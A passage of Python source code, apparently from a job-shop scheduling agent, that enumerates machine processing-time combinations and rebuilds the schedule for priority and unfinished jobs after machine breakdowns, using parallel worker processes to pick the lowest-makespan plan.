min_delta_macs[machine_temp] = min_delta_temp
# comb_list_macs[machine_temp] = comb_list.copy()
# delta_list_macs[machine_temp] = delta_list.copy()
for ind_iter in range(num_iter_expansion):
new_comb_list = []
new_delta_list = []
len_comb = len(comb_list)
for ind_comb in range(len_comb):
delta_before = delta_list[ind_comb]
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
processing_time_temp = process_time_mac_jobs[machine_temp][key_job_type]
if processing_time_temp <= 0:
continue
# if processing_time_temp <= 0:
comb_temp = copy.deepcopy(comb_list[ind_comb])
if comb_temp[1][ind_job_type] <= 0:
delta_new = delta_before - processing_time_temp
if delta_new < -min_delta_temp and delta_new >= min_delta_temp:
comb_temp[0][ind_job_type] = comb_temp[0][ind_job_type] + 1
if delta_new < 0 and delta_new not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_new] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if delta_new < 0 and max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_new]):
flag_repetition = False
for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
flag_repetition = True
break
# if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
# for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if flag_repetition == False:
delta_comb_macs[machine_temp][delta_new].append(comb_temp)
# if flag_repetition == False:
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
new_comb_list.append(comb_temp)
new_delta_list.append(delta_new)
# if delta_new < 0 and delta_new >= min_delta_temp:
# if comb_temp[1][ind_job_type] <= 0:
comb_temp = copy.deepcopy(comb_list[ind_comb])
if comb_temp[0][ind_job_type] <= 0:
delta_new = delta_before + processing_time_temp
if delta_new < -min_delta_temp and delta_new >= min_delta_temp:
comb_temp[1][ind_job_type] = comb_temp[1][ind_job_type] + 1
if delta_new < 0 and delta_new not in delta_comb_macs[machine_temp]:
delta_comb_macs[machine_temp][delta_new] = []
count_unique_delta = count_unique_delta + 1
# if delta_temp not in delta_comb_macs[machine_temp]:
if delta_new < 0 and max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_new]):
flag_repetition = False
for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
flag_repetition = True
break
# if delta_comb_macs[machine_temp][delta_new][ind_comb_delta] == comb_temp:
# for ind_comb_delta in range( len(delta_comb_macs[machine_temp][delta_new]) ):
if flag_repetition == False:
delta_comb_macs[machine_temp][delta_new].append(comb_temp)
# if flag_repetition == False:
# if max_num_comb_per_delta > len(delta_comb_macs[machine_temp][delta_temp]):
new_comb_list.append(comb_temp)
new_delta_list.append(delta_new)
# if delta_new < 0 and delta_new >= min_delta_temp:
# if comb_temp[0][ind_job_type] <= 0:
# for ind_job_type in range(num_job_types):
# for ind_comb in range(len_comb):
comb_list = copy.deepcopy(new_comb_list)
delta_list = copy.deepcopy(new_delta_list)
if count_unique_delta + min_delta_temp >= 0 and ind_iter >= threshold_num_iter:
break
# if count_unique_delta + min_delta_temp >= 0 and ind_iter >= 3:
# for ind_iter in range(10):
# for machine_temp in self.machines:
max_length_comb = 500
num_iter_comb = 10
length_comb_macs = {}
for machine_type_temp in self.machines:
length_comb_macs[machine_type_temp] = []
list_base = [0]
for count_iter in range(num_iter_comb):
list_new = []
for ind_list in range(len(list_base)):
for ind_job_type in range(num_job_types):
key_job_type = keys_job_types[ind_job_type]
if process_time_mac_jobs[machine_type_temp][key_job_type] != -1:
process_time_temp = process_time_mac_jobs[machine_type_temp][key_job_type]
length_temp = process_time_temp + list_base[ind_list]
if len(length_comb_macs[machine_type_temp] ) > 0:
pos_new = 0
sentinel_same = False
while pos_new < len(length_comb_macs[machine_type_temp] ):
if length_comb_macs[machine_type_temp][pos_new] < length_temp:
pos_new = pos_new + 1
elif length_comb_macs[machine_type_temp][pos_new] == length_temp:
sentinel_same = True
break
else:
break
# if length_comb_macs[machine_type_temp][pos_new] < process_time_temp:
# while pos_new < len(length_comb_macs[machine_type_temp] ):
if sentinel_same == False and max_length_comb > length_temp:
length_comb_macs[machine_type_temp].insert(pos_new, length_temp)
list_new.append(length_temp)
# if sentinel_same == False:
else:
length_comb_macs[machine_type_temp].append(process_time_temp + list_base[ind_list])
list_new.append(process_time_temp + list_base[ind_list])
# if len(length_comb_macs[machine_type_temp] ) > 0:
# if process_time_mac_jobs[machine_temp][key_job_type] != -1:
# for ind_job_type in range(num_job_types):
# for ind_list in range(len(list_base)):
list_base = list_new
# for count_iter in range(num_iter_comb):
# for machine_type_temp in self.machines:
self.num_job_types = num_job_types
self.num_kind_mac = num_kind_mac
self.num_machine_types = num_machine_types
self.idx_mac_types = idx_mac_types
self.num_op_job_types = num_op_job_types
self.key_dict_job_types = key_dict_job_types
self.process_time_mac_jobs = process_time_mac_jobs
self.delta_comb_macs = delta_comb_macs
self.min_delta_macs = min_delta_macs
self.keys_job_types = keys_job_types
self.keys_mac_types = keys_mac_types
self.hash_ind_mac_types = hash_ind_mac_types
self.hash_ind_job_types = hash_ind_job_types
self.name_macs = name_macs
self.length_comb_macs = length_comb_macs
self.max_length_comb = max_length_comb
# self.sentinel_start = True
# def __init__(self, job_types, machines):
def act(self, machine_status, job_status, cur_time, job_list):
#---------------- Initialization ----------------#
if cur_time == 0: # self.sentinel_start:
self.init_construction(job_status, job_list, machine_status, cur_time)
# if self.sentinel_start:
#---------------- Breakdown Checking ----------------#
sentinel_breakdown = False
for machine_temp in machine_status:
if self.flag_mac_available[machine_temp] == 1 and machine_status[machine_temp]['status'] == 'down':
sentinel_breakdown = True
self.mac_set_breakdown.append(machine_temp)
self.flag_mac_available[machine_temp] = 0
mac_type_breakdown = machine_status[machine_temp]['type']
self.num_machine_available_types[mac_type_breakdown] = self.num_machine_available_types[mac_type_breakdown] - 1
# if machine_status[machine_temp]['status'] == 'down':
# for machine_temp in machine_status:
#---------------- Restoration ----------------#
if sentinel_breakdown:
# coeff_tardiness = 0.5
# start_time = time.time()
manager = multiprocessing.Manager()
makespan_ct_dict = manager.dict()
data_ct_dict = manager.dict()
jobs_ct = []
# set_coeff_tardiness = [1.0, 0.5, 0.2, 0.1, 0.05, 0.01]
for ind_process in range(6):
proc = multiprocessing.Process(target=process_generate_resume, args=(self, cur_time, job_status, machine_status, self.set_coeff_tardiness[ind_process], makespan_ct_dict, data_ct_dict))
jobs_ct.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_ct:
proc.join()
# for proc in jobs:
            ct_min_makespan = min(makespan_ct_dict, key=makespan_ct_dict.get)
makespan_best = makespan_ct_dict[ct_min_makespan]
new_op_seq_machines_best, new_job_seq_machines_best, new_start_time_op_macs_best, new_end_time_op_macs_best, new_start_time_ops_best, new_end_time_ops_best, new_mac_assignment_ops_best, new_flag_scheduled_ops_best, count_scheduled_op_macs_best, new_flag_scheduled_jobs_best = data_ct_dict[ct_min_makespan]
if makespan_best > 9999:
print(0)
coeff_tardiness_best = ct_min_makespan
#print(makespan_ct_dict.values())
#print(ct_min_makespan)
#print(makespan_ct_dict[ct_min_makespan])
makespan_rnd_dict = manager.dict()
data_rnd_dict = manager.dict()
jobs_rnd = []
for ind_process in range(6):
proc = multiprocessing.Process(target=process_iteration_resume, args=(self, ind_process, cur_time, job_status, machine_status, coeff_tardiness_best, makespan_best, makespan_rnd_dict, data_rnd_dict))
jobs_rnd.append(proc)
proc.start()
# for ind_process in range(6):
for proc in jobs_rnd:
proc.join()
# for proc in jobs:
            ind_rnd_min_makespan = min(makespan_rnd_dict, key=makespan_rnd_dict.get)
if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
makespan_best = makespan_rnd_dict[ind_rnd_min_makespan]
new_op_seq_machines_best, new_job_seq_machines_best, new_start_time_op_macs_best, new_end_time_op_macs_best, new_start_time_ops_best, new_end_time_ops_best, new_mac_assignment_ops_best, new_flag_scheduled_ops_best, count_scheduled_op_macs_best, new_flag_scheduled_jobs_best = data_rnd_dict[ind_rnd_min_makespan]
# if makespan_rnd_dict[ind_rnd_min_makespan] < makespan_best:
# elapsed_time = (time.time() - start_time)
# print(elapsed_time)
# makespan, new_op_seq_machines, new_job_seq_machines, new_start_time_op_macs, new_end_time_op_macs, new_start_time_ops, new_end_time_ops, new_mac_assignment_ops, new_flag_scheduled_ops, count_scheduled_op_macs, new_flag_scheduled_jobs = self.generation_resume(cur_time, job_status, machine_status, coeff_tardiness)
self.op_seq_machines = new_op_seq_machines_best
self.job_seq_machines = new_job_seq_machines_best
self.start_time_op_macs = new_start_time_op_macs_best
self.end_time_op_macs = new_end_time_op_macs_best
self.start_time_ops = new_start_time_ops_best
self.end_time_ops = new_end_time_ops_best
self.mac_assignment_ops = new_mac_assignment_ops_best
self.flag_scheduled_ops = new_flag_scheduled_ops_best
self.count_scheduled_op_macs = count_scheduled_op_macs_best
self.new_flag_scheduled_jobs = new_flag_scheduled_jobs_best
#---------------- Verification ----------------#
penalty_pending_constraint = 0
for ind_job_check in range(self.num_job):
name_job_check = self.name_jobs[ind_job_check]
type_job_check = self.type_jobs[ind_job_check]
priority_job_check = job_status[name_job_check]['priority']
if self.flag_scheduled_jobs[ind_job_check] != 1:
print('unscheduled job')
# if flag_scheduled_jobs[flag_scheduled_jobs] != 0:
num_op_job_check = int( self.num_op_jobs[ind_job_check] )
idx_first_op_job_check = self.idx_first_op_jobs[ind_job_check]
for ind_op_job_check in range(num_op_job_check):
op_check = int( idx_first_op_job_check + ind_op_job_check )
if self.flag_scheduled_ops[op_check] != 1:
                    print('unscheduled operation')
# if flag_scheduled_ops[idx_first_op_job_check + ind_op_job_check] != 1:
if ind_op_job_check > 0:
if self.end_time_ops[op_check - 1] > self.start_time_ops[op_check]:
print('incorrect start time')
# if end_time_ops[op_check - 1] > start_time_ops[op_check]:
# if ind_op_job_check > 0:
if priority_job_check > 0:
pending_constraint_op = self.job_types[type_job_check][ind_op_job_check]['max_pend_time']
time_comp = -1
if ind_op_job_check == 0:
time_comp = self.arrival_time_jobs[ind_job_check]
if time_comp < 0:
print('wrong arrival time')
# if time_comp <= 0:
else: # not the first operation of this job
time_comp = self.end_time_ops[op_check - 1]
# if ind_op_job_check == 0:
if self.start_time_ops[op_check] - time_comp > pending_constraint_op:
print('violated the pending constraint')
penalty_pending_constraint = penalty_pending_constraint + priority_job_check * 10 * (self.start_time_ops[op_check] - time_comp - pending_constraint_op)
# if end_time_ops[op_check] - time_comp >= pending_constraint_op:
# if job_status[name_job_check]['priority'] > 0:
# for ind_op_job_check in range(num_op_job_check):
# for ind_job_check in range(self.num_job):
for machine_temp in machine_status:
len_op_seq = len(self.op_seq_machines[machine_temp])
for ind_op_seq in range(len_op_seq-1):
if self.end_time_op_macs[machine_temp][ind_op_seq] > self.start_time_op_macs[machine_temp][ind_op_seq+1]:
print('Incorrect start time')
# if new_end_time_op_macs[machine_temp][ind_op_seq] > new_start_time_op_macs[machine_temp][ind_op_seq+1]:
# for ind_op_seq in range(len_op_seq-1):
# for machine_temp in machine_status:
print(penalty_pending_constraint)
# if sentinel_breakdown:
action = {}
for machine_temp in job_list:
ind_job_schedule_mac = self.count_scheduled_op_macs[machine_temp]
if ind_job_schedule_mac >= len(self.start_time_op_macs[machine_temp]):
continue
# if ind_job_schedule_mac >= len(self.start_time_op_macs[machine_temp]):
if cur_time == self.start_time_op_macs[machine_temp][ind_job_schedule_mac]:
action[machine_temp] = self.job_seq_machines[machine_temp][ind_job_schedule_mac]
self.count_scheduled_op_macs[machine_temp] = self.count_scheduled_op_macs[machine_temp] + 1
# if cur_time == self.start_time_op_macs[machine_temp][ind_job_schedule_mac]:
# for machine_temp in job_list:
return action
# def act(self, machine_status, job_status, cur_time, job_list):
def generation_resume(self, cur_time, job_status, machine_status, coeff_tardiness, rnd_mode):
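"""Rebuild the schedule from cur_time onwards, e.g. after a machine breakdown.
The Retention pass keeps the already-executed prefix of every machine's sequence, the Priority
pass re-inserts the remaining operations of priority jobs under their max_pend_time limits
(rnd_mode == 1 randomizes the machine choice), partially finished ordinary jobs are completed,
and the rest of the jobs are dispatched greedily with coeff_tardiness weighting the tardiness
score. Returns the makespan together with the rebuilt per-machine and per-operation arrays."""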
count_scheduled_op_macs = {}
for machine_temp in self.name_macs:
count_scheduled_op_macs[machine_temp] = 0
# for machine_temp in key_job_list:
#---------------- Construction ----------------#
big_num = 99999
# new_num_job_dispatch_mac = self.group_job_mac.copy()
new_op_seq_machines = {}
new_job_seq_machines = {}
new_start_time_op_macs = {}
new_end_time_op_macs = {}
new_op_anchor_type_macs = {}
for machine_temp in machine_status:
new_op_seq_machines[machine_temp] = []
new_job_seq_machines[machine_temp] = []
new_start_time_op_macs[machine_temp] = []
new_end_time_op_macs[machine_temp] = []
new_op_anchor_type_macs[machine_temp] = -1
# for machine_temp in self.machines:
new_flag_scheduled_jobs = np.zeros(self.num_job)
new_flag_scheduled_ops = np.zeros(self.total_num_ops)
new_start_time_ops = -1 * np.ones(self.total_num_ops)
new_end_time_ops = -1 * np.ones(self.total_num_ops)
new_mac_assignment_ops = {}
new_ready_time_type_macs = {}
flag_available_type_macs = {}
available_mac_offset = {}
# broken_mac_offset = {}
new_scheduled_length_mac_types = {}
for machine_type_temp in self.machines:
new_ready_time_type_macs[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp]) # [0 for _ in range(self.num_machine_types[machine_type_temp])]
flag_available_type_macs[machine_type_temp] = np.ones(self.num_machine_types[machine_type_temp])
available_mac_offset[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp])
# broken_mac_offset[machine_type_temp] = np.zeros(self.num_machine_types[machine_type_temp])
new_scheduled_length_mac_types[machine_type_temp] = 0
# for machine_type_temp in self.machines:
for ind_mac_broken in range(len(self.mac_set_breakdown)):
mac_broken = self.mac_set_breakdown[ind_mac_broken]
type_mac_broken = machine_status[mac_broken]['type']
hash_idx_mac_broken = self.hash_ind_mac_types[mac_broken]
flag_available_type_macs[type_mac_broken][hash_idx_mac_broken] = 0
available_mac_offset[type_mac_broken][hash_idx_mac_broken] = big_num
# broken_mac_offset[type_mac_broken][hash_idx_mac_broken] = -big_num
# for ind_mac_broken in range(len(mac_set_breakdown)):
num_scheduled_jobs_per_type = {}
for key_job_type in self.key_dict_job_types:
num_scheduled_jobs_per_type[key_job_type] = 0
# for key_job_type in self.key_dict_job_types:
occupy_time_type_macs = {}
cumul_pend_time_type_macs = {}
for mac_type_temp in self.machines:
occupy_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
cumul_pend_time_type_macs[mac_type_temp] = np.zeros(self.num_machine_types[mac_type_temp])
# for mac_type_temp in self.machines:
#---------------- Retention ----------------#
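# Carry over the already-executed prefix of each machine's sequence: stop at the first operation
# that starts at or after cur_time, or, on an unavailable machine, at the first operation that
# would still be running at cur_time.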
ordinary_job_inspect_list = []
for machine_temp in self.name_macs:
mac_type_temp = machine_status[machine_temp]['type']
hash_ind_mac_temp = self.hash_ind_mac_types[machine_temp]
ind_op_mac_temp = 0
len_op_mac_temp = len(self.op_seq_machines[machine_temp])
while ind_op_mac_temp < len_op_mac_temp:
idx_op_temp = self.op_seq_machines[machine_temp][ind_op_mac_temp]
ind_job_op_temp = self.ind_job_ops[idx_op_temp] # self.job_seq_machines[machine_temp][ind_op_mac_temp]
job_name_temp = self.name_jobs[ind_job_op_temp]
ind_op_op_temp = self.ind_op_ops[idx_op_temp]
job_type_temp = self.type_jobs[ind_job_op_temp]
priority_job_temp = job_status[job_name_temp]['priority']
if self.start_time_op_macs[machine_temp][ind_op_mac_temp] >= cur_time:
break
# if self.start_time_op_macs[machine_temp][ind_op_mac_temp] >= cur_time:
if self.flag_mac_available[machine_temp] == 0 and self.end_time_op_macs[machine_temp][ind_op_mac_temp] > cur_time:
break
# if self.flag_mac_available[machine_temp] == 0 and self.end_time_op_macs[machine_temp][ind_op_mac_temp] > cur_time:
new_op_seq_machines[machine_temp].append(idx_op_temp)
new_job_seq_machines[machine_temp].append(job_name_temp)
new_start_time_op_macs[machine_temp].append(self.start_time_op_macs[machine_temp][ind_op_mac_temp])
new_end_time_op_macs[machine_temp].append(self.end_time_op_macs[machine_temp][ind_op_mac_temp])
new_start_time_ops[idx_op_temp] = self.start_time_ops[idx_op_temp]
new_end_time_ops[idx_op_temp] = self.end_time_ops[idx_op_temp]
process_time_temp = new_end_time_ops[idx_op_temp] - new_start_time_ops[idx_op_temp] # self.job_types[job_type_temp][ind_op_op_temp]['process_time']
new_scheduled_length_mac_types[mac_type_temp] = new_scheduled_length_mac_types[mac_type_temp] + process_time_temp
new_flag_scheduled_ops[idx_op_temp] = 1
new_mac_assignment_ops[idx_op_temp] = machine_temp
occupy_time_type_macs[mac_type_temp][hash_ind_mac_temp] = occupy_time_type_macs[mac_type_temp][hash_ind_mac_temp] + process_time_temp
# if self.priority_jobs[ind_job_op_temp] <= 0:
# new_op_anchor_type_macs[machine_temp] = idx_op_temp
# # if self.priority_jobs[ind_job_op_temp] <= 0:
if ind_op_op_temp == 0:
new_flag_scheduled_jobs[ind_job_op_temp] = 1
# new_count_scheduled_jobs = new_count_scheduled_jobs + 1
if priority_job_temp <= 0:
ordinary_job_inspect_list.append(ind_job_op_temp)
num_scheduled_jobs_per_type[job_type_temp] = num_scheduled_jobs_per_type[job_type_temp] + 1
# if priority_job_temp > 0:
# if ind_op_op_temp == 0:
if ind_op_mac_temp > 0:
pend_time_temp = new_start_time_op_macs[machine_temp][ind_op_mac_temp] - new_end_time_op_macs[machine_temp][ind_op_mac_temp-1] # idle gap on this machine between consecutive retained operations
if pend_time_temp > 0:
cumul_pend_time_type_macs[mac_type_temp][hash_ind_mac_temp] = cumul_pend_time_type_macs[mac_type_temp][hash_ind_mac_temp] + pend_time_temp
# if pend_time_temp > 0:
# if ind_op_mac_temp > 0:
count_scheduled_op_macs[machine_temp] = count_scheduled_op_macs[machine_temp] + 1
ind_op_mac_temp = ind_op_mac_temp + 1
# while ind_op_mac_temp < len_op_mac_temp:
if len(new_end_time_op_macs[machine_temp]) > 0:
new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] = new_end_time_op_macs[machine_temp][-1] # self.end_time_op_macs[machine_temp][ind_op_mac_temp]
if new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] < cur_time:
new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] = cur_time
# if new_ready_time_type_macs[mac_type_temp][hash_ind_mac_temp] < cur_time:
# if len(new_end_time_op_macs[machine_temp]) > 0:
# for machine_temp in self.name_macs:
#---------------- Priority ----------------#
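# Re-insert the unscheduled operations of priority jobs. Machines of the required type are tried
# starting from the least-loaded one (or a random available one when rnd_mode == 1); when appending
# at the end would exceed the pending deadline, priority_backward is tried first to shift earlier
# operations and keep the constraint feasible.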
for ind_set_job_priority in range(self.size_set_job_priority):
name_job_priority = self.set_job_priority[ind_set_job_priority]
idx_job_priority = int( self.idx_set_job_priority[name_job_priority] )
type_job_priority = self.type_jobs[idx_job_priority]
num_op_job_priority = int( self.num_op_jobs[idx_job_priority] )
idx_first_op_job_priority = self.idx_first_op_jobs[idx_job_priority]
job_constraint_temp = self.arrival_jobs_priority[name_job_priority]
for ind_op_job_priority in range(num_op_job_priority):
idx_op_schedule = int( idx_first_op_job_priority + ind_op_job_priority )
if new_flag_scheduled_ops[idx_op_schedule] == 1:
if new_end_time_ops[idx_op_schedule] > job_constraint_temp:
job_constraint_temp = new_end_time_ops[idx_op_schedule]
# if new_end_time_ops[idx_op_schedule] > job_constraint_temp:
continue
# if new_flag_scheduled_ops[idx_op_schedule] == 1:
mac_type_op_schedule = self.machine_type_ops[idx_op_schedule]
process_time_op_schedule = self.process_time_mac_jobs[mac_type_op_schedule][type_job_priority]
pend_time_op_schedule = self.job_types[type_job_priority][ind_op_job_priority]['max_pend_time']
start_time_final = -1
pend_time_final = -1
mac_op_final = None
ind_position_final = -1
num_mac_same_type = self.num_machine_types[mac_type_op_schedule]
idx_mac_min_leng = np.argmin(occupy_time_type_macs[mac_type_op_schedule] + cumul_pend_time_type_macs[mac_type_op_schedule] + available_mac_offset[mac_type_op_schedule])
if rnd_mode == 1:
idx_mac_min_leng = random.randint(0, num_mac_same_type-1)
mac_min_leng = self.machines[mac_type_op_schedule][idx_mac_min_leng]
while self.flag_mac_available[mac_min_leng] == 0:
idx_mac_min_leng = random.randint(0, num_mac_same_type-1)
mac_min_leng = self.machines[mac_type_op_schedule][idx_mac_min_leng]
# while self.flag_mac_available[mac_op_schedule] == 0:
# if rnd_mode == 1:
#----------- Postpone -----------#
# if pend_time_final > 0:
count_attempt = 0
idx_mac_op_schedule = idx_mac_min_leng
while count_attempt < num_mac_same_type:
mac_op_schedule = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
if self.flag_mac_available[mac_op_schedule] == 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
continue
# if self.flag_mac_available[mac_candidate] == 0:
start_time_candidate = job_constraint_temp
if len(new_end_time_op_macs[mac_op_schedule]) > 0:
if new_end_time_op_macs[mac_op_schedule][-1] > start_time_candidate:
start_time_candidate = new_end_time_op_macs[mac_op_schedule][-1]
# if new_end_time_op_macs[mac_op_schedule][-1] > start_time_candidate:
# if len(new_end_time_op_macs[mac_op_schedule]) > 0:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
if job_constraint_temp + pend_time_op_schedule - start_time_candidate < 0:
sentinel_feasible, start_time_ops_trial, end_time_ops_trial, start_time_op_macs_trial, end_time_op_macs_trial = self.priority_backward(cur_time, new_start_time_ops, new_end_time_ops, new_start_time_op_macs, new_end_time_op_macs, ind_op_job_priority, start_time_candidate, pend_time_op_schedule, idx_first_op_job_priority, idx_job_priority, new_mac_assignment_ops, new_op_seq_machines)
if sentinel_feasible:
pend_time_final = 0
mac_op_final = mac_op_schedule
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
new_start_time_ops = start_time_ops_trial # copy.deepcopy(start_time_ops)
new_end_time_ops = end_time_ops_trial # copy.deepcopy(end_time_ops)
new_start_time_op_macs = start_time_op_macs_trial # copy.deepcopy(start_time_op_macs)
new_end_time_op_macs = end_time_op_macs_trial # copy.deepcopy(end_time_op_macs)
break
# sentinel_feasible
else:
pend_time_final = 0
mac_op_final = mac_op_schedule
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
# if job_constraint_temp + pend_time_op_schedule - start_time_candidate < 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
# while count_attempt < num_mac_same_type:
# if pend_time_final > 0:
#----------- Last Insertion -----------#
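# Fallback when no machine meets the pending deadline directly: append the operation on the
# available machine with the smallest deadline overshoot, stopping early if a machine fits
# without any overshoot.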
if pend_time_final == -1:
count_attempt = 0
idx_mac_op_schedule = idx_mac_min_leng
while count_attempt < num_mac_same_type:
mac_candidate = self.machines[mac_type_op_schedule][idx_mac_op_schedule]
if self.flag_mac_available[mac_candidate] == 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
continue
# if self.flag_mac_available[mac_candidate] == 0:
start_time_candidate = job_constraint_temp
if len(new_end_time_op_macs[mac_candidate]) > 0:
if new_end_time_op_macs[mac_candidate][-1] > start_time_candidate:
start_time_candidate = new_end_time_op_macs[mac_candidate][-1]
# if new_end_time_op_macs[mac_candidate][-1] > start_time_candidate:
# if len(new_end_time_op_macs[mac_candidate]) > 0:
if start_time_candidate < cur_time:
start_time_candidate = cur_time
# if start_time_candidate < cur_time:
pend_time_candidate = start_time_candidate - job_constraint_temp - pend_time_op_schedule
if pend_time_final == -1:
pend_time_final = pend_time_candidate
mac_op_final = mac_candidate
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
elif pend_time_candidate < pend_time_final:
pend_time_final = pend_time_candidate
mac_op_final = mac_candidate
start_time_final = start_time_candidate
ind_position_final = len(new_op_seq_machines[mac_op_final])
# if pend_time_final == -1:
if pend_time_final <= 0:
break
# if pend_time_candidate <= 0:
idx_mac_op_schedule = (idx_mac_op_schedule + 1) % num_mac_same_type
count_attempt = count_attempt + 1
# while count_attempt < num_mac_same_type:
# if pend_time_final > 0:
#------- update intermediate data -------#
new_start_time_ops[idx_op_schedule] = start_time_final
new_end_time_ops[idx_op_schedule] = start_time_final + process_time_op_schedule
new_op_seq_machines[mac_op_final].insert(ind_position_final, idx_op_schedule)
new_job_seq_machines[mac_op_final].insert(ind_position_final, name_job_priority)
new_start_time_op_macs[mac_op_final].insert(ind_position_final, new_start_time_ops[idx_op_schedule])
new_end_time_op_macs[mac_op_final].insert(ind_position_final, new_end_time_ops[idx_op_schedule])
new_mac_assignment_ops[idx_op_schedule] = mac_op_final
new_flag_scheduled_ops[idx_op_schedule] = 1
new_scheduled_length_mac_types[mac_type_op_schedule] = new_scheduled_length_mac_types[mac_type_op_schedule] + process_time_op_schedule
occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] = occupy_time_type_macs[mac_type_op_schedule][idx_mac_op_schedule] + process_time_op_schedule
job_constraint_temp = new_end_time_ops[idx_op_schedule]
# for ind_op_job_priority in range(num_op_job_priority):
new_flag_scheduled_jobs[idx_job_priority] = 1
# for ind_job_priority in range(size_set_job_priority):
#---------------- Unfinished Jobs ----------------#
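# Complete the ordinary jobs whose earlier operations were retained: repeatedly take the unfinished
# operation with the earliest job constraint, pick a machine of its type (falling back to the
# least-loaded available machine if the original assignment is broken), and insert it around the
# already-placed priority operations, postponing a priority operation only when its pending
# constraint still allows it.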
pos_insertion_macs = {}
op_priority_ref_macs = {}
for mac_type_temp in self.machines:
num_mac_type_temp = self.num_machine_types[mac_type_temp]
# pos_insertion_type_mac[mac_type_temp] = np.zeros(num_mac_type_temp)
for ind_mac_type in range(num_mac_type_temp):
mac_name_temp = self.machines[mac_type_temp][ind_mac_type]
count_scheduled_op_temp = count_scheduled_op_macs[mac_name_temp]
pos_insertion_macs[mac_name_temp] = count_scheduled_op_temp
if count_scheduled_op_temp < len(new_op_seq_machines[mac_name_temp]):
op_temp = new_op_seq_machines[mac_name_temp][count_scheduled_op_temp]
ind_job_temp = self.ind_job_ops[op_temp]
name_job_temp = self.name_jobs[ind_job_temp]
priority_job_temp = self.priority_jobs_priority[name_job_temp]
if priority_job_temp > 0:
op_priority_ref_macs[mac_name_temp] = int( op_temp )
else:
print('incorrect processing sequence')
# if priority_job_temp > 0:
else:
op_priority_ref_macs[mac_name_temp] = -1
# pos_insertion_macs[mac_name_temp] = count_scheduled_op_temp
# for ind_mac_type in range(num_mac_type_temp):
# for mac_type_temp in self.machines:
for machine_temp in machine_status:
num_op_mac_temp = len(new_op_seq_machines[machine_temp])
# ind_last_ordinary_op = 0
for ind_op_mac in range(num_op_mac_temp):
op_iter = new_op_seq_machines[machine_temp][ind_op_mac]
ind_job_op_iter = self.ind_job_ops[op_iter]
priority_op_iter = self.priority_jobs[ind_job_op_iter]
if priority_op_iter == 0:
new_op_anchor_type_macs[machine_temp] = op_iter
# if priority_op_iter == 0:
# for ind_op_mac in range(num_op_mac_temp):
# for machine_temp in machine_status:
set_job_unfinished = []
idx_op_set_job_unfinished = []
final_idx_op_set_job_unfinished = []
job_constraint_set_job_unfinished = []
for job_inspect in ordinary_job_inspect_list:
idx_first_op_job_inspect = int( self.idx_first_op_jobs[job_inspect] )
num_op_job_inspect = int( self.num_op_jobs[job_inspect] )
for ind_op_iter_inspect in range(num_op_job_inspect):
if new_flag_scheduled_ops[int( idx_first_op_job_inspect + ind_op_iter_inspect)] != 1:
set_job_unfinished.append(job_inspect)
idx_op_set_job_unfinished.append(idx_first_op_job_inspect + ind_op_iter_inspect)
final_idx_op_set_job_unfinished.append(idx_first_op_job_inspect + num_op_job_inspect - 1)
end_time_op_prev = new_end_time_ops[int(idx_first_op_job_inspect + ind_op_iter_inspect - 1)]
if ind_op_iter_inspect != 0 and end_time_op_prev > 0:
job_constraint_set_job_unfinished.append(end_time_op_prev)
# if ind_op_iter_inspect != 0 and end_time_op_prev > 0:
break
# if new_flag_scheduled_ops[idx_first_op_job_inspect + ind_op_iter_inspect] != 1:
# for ind_op_iter_inspect in range(num_op_job_inspect):
# for job_inspect in job_inspect_list:
size_set_job_unfinished = len(set_job_unfinished)
while size_set_job_unfinished > 0:
ind_set_op_earliest = np.argmin(job_constraint_set_job_unfinished)
op_earliest = idx_op_set_job_unfinished[ind_set_op_earliest] # int( )
if new_flag_scheduled_ops[op_earliest] == 1:
print('unexpected scheduled operation')
# if new_flag_scheduled_ops[op_earliest] == 1:
mac_op_earliest = self.mac_assignment_ops[op_earliest]
ind_job_op_earliest = self.ind_job_ops[op_earliest]
job_type_op_earliest = self.type_jobs[ind_job_op_earliest]
ind_op_op_earliest = self.ind_op_ops[op_earliest]
process_time_op_earliest = self.job_types[job_type_op_earliest][ind_op_op_earliest]['process_time']
mac_type_op_earliest = self.machine_type_ops[op_earliest]
if self.flag_mac_available[mac_op_earliest] == 0:
ind_mac_selected_type_macs = np.argmin(new_ready_time_type_macs[mac_type_op_earliest] + available_mac_offset[mac_type_op_earliest])
mac_op_earliest = self.machines[mac_type_op_earliest][ind_mac_selected_type_macs]
# if self.flag_mac_available[mac_op_earliest] == 0:
# mac_type_op_earliest = machine_status[mac_op_earliest]['type']
ind_mac_op_earliest = self.hash_ind_mac_types[mac_op_earliest]
